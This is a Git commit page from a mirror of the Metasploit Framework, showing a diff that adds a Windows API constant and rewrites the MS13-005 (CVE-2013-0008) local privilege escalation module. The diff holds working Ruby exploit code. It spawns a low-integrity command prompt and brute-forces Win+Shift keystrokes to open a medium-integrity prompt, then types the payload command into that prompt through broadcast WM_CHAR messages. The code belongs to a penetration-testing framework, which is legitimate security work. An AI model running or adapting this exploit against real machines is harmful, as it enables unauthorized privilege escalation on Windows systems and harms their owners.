infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add api constants and tidy

bug/bundler_fix
Meatballs 2013-07-26 01:48:39 +01:00
parent 0235e6803d
commit b99ad41a64
2 changed files with 89 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb
View File

@ -48,6 +48,7 @@ class ApiConstants
# Slurp in a giant list of known constants. # Slurp in a giant list of known constants.
# #
def self.add_constants(win_const_mgr) def self.add_constants(win_const_mgr)
win_const_mgr.add_const('HWND_BROADCAST',0x00000FFFF)
win_const_mgr.add_const('MCI_DGV_SETVIDEO_TINT',0x00004003) win_const_mgr.add_const('MCI_DGV_SETVIDEO_TINT',0x00004003)
win_const_mgr.add_const('EVENT_TRACE_FLAG_PROCESS',0x00000001) win_const_mgr.add_const('EVENT_TRACE_FLAG_PROCESS',0x00000001)
win_const_mgr.add_const('TF_LBI_TOOLTIP',0x00000004) win_const_mgr.add_const('TF_LBI_TOOLTIP',0x00000004)

114
modules/exploits/windows/local/ms13_005.rb
View File

@ -16,8 +16,19 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={}) def initialize(info={})
super( update_info( info, super( update_info( info,
'Name' => 'MS13-005 Low Integrity to Medium Integrity Privilege Escalation', 'Name' => 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
'Description' => %q{ 'Description' => %q{
The Windows kernel does not properly isolate broadcast messages from low integrity
applications from medium or high integrity applications. This allows commands to be
broadcasted to an open medium or high integrity command prompts allowing escalation
of privileges. We can spawn a medium integrity command prompt, after spawning a low
integrity command prompt, by using the Win+Shift+# combination to specify the position
of the command prompt on the taskbar. We can then broadcast our command and hope that
the user is away and doesn't corrupt it by interracting with the UI.
Broadcast issue affects versions Windows Vista, 7, 8, Server 2008, Server 2008 R2,
Server 2012, RT. Spawning a command prompt with the shortcut key does not work in
Vista so you will have to check if the user is already running a command prompt
and set SPAWN_PROMPT false.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -34,9 +45,27 @@ class Metasploit3 < Msf::Exploit::Local
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate'=> "Nov 27 2912" 'DisclosureDate'=> "Nov 27 2012",
# References CVE-2013-0008 'References' =>
[
[ 'CVE', '2013-0008' ],
[ 'MSB', 'MS13-005' ],
[ 'OSVDB', '88966'],
[ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ]
]
)) ))
register_options(
[
OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true])
], self.class
)
register_advanced_options(
[
OptBool.new('EEGG', [false, '',])
]
)
end end
def win_shift(number) def win_shift(number)
@ -44,11 +73,13 @@ class Metasploit3 < Msf::Exploit::Local
bscan = 0x81 + number bscan = 0x81 + number
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0) client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
sleep(0.01)
client.railgun.user32.keybd_event(vk, bscan, 0, 0) client.railgun.user32.keybd_event(vk, bscan, 0, 0)
sleep(0.01)
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
end end
def count_cmd_procs def count_cmd_procs
@ -58,48 +89,67 @@ class Metasploit3 < Msf::Exploit::Local
count += 1 count += 1
end end
end end
puts count
vprint_status("Cmd prompt count: #{count}")
return count return count
end end
# Run Method for when run command is issued def cleanup
def exploit if datastore['SPAWN_PROMPT']
@payload_name = datastore['PAYLOAD'] vprint_status("Rehiding window...")
@payload_arch = framework.payloads.create(@payload_name).arch client.railgun.user32.ShowWindow(@hwin, 0)
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
hwin = client.railgun.kernel32.GetConsoleWindow()['return']
if hwin == nil
hwin = client.railgun.user32.GetForegroundWindow()['return']
end end
puts client.railgun.user32.ShowWindow(hwin, 0) end
puts client.railgun.user32.ShowWindowAsync(hwin, 5)
def exploit
# syinfo is only on meterpreter sessions
e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg=="
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
if datastore['SPAWN_PROMPT']
@hwin = client.railgun.kernel32.GetConsoleWindow()['return']
if @hwin == nil
@hwin = client.railgun.user32.GetForegroundWindow()['return']
end
#client.railgun.user32.ShowWindow(@hwin, 0)
#client.railgun.user32.ShowWindow(@hwin, 5)
# Spawn low integrity cmd.exe # Spawn low integrity cmd.exe
li_cmd_pid = client.sys.process.execute("cmd.exe", nil, {'Hidden' => false }).pid print_status("Spawning Low Integrity Cmd Prompt")
windir = client.fs.file.expand_path("%windir%")
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs count = count_cmd_procs
# Win+Shift+? spawned = false
number = 0 # Bruteforce taskbar position Win+Shift+?
begin # Ruby DoWhile! print_status("Bruteforcing Taskbar Position")
i = (9 - number) 9.downto(1) do |number|
vprint_status("Attempting Win+Shift+#{number}")
win_shift(number) win_shift(number)
number += 1
sleep(1) sleep(1)
end while count_cmd_procs == count and number <= 9
print_status "Spawned!!!" if count_cmd_procs > count
print_good("Spawned Medium Integrity Cmd Prompt")
spawned = true
break
end
end
client.sys.process.kill(li_cmd_pid) client.sys.process.kill(li_cmd_pid)
payload = "calc.exe"
hwnd_broadcast = 0xffff fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned
wm_char = 0x0102 end
print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
payload = Rex::Text.decode_base64(e) if datastore['EEGG']
payload.each_char do |c| payload.each_char do |c|
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, c.unpack('c').first, 0) print c
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
sleep(0.01)
end end
print_line
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, 'VK_RETURN', 0) print_status("Executing command...")
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
end end
end end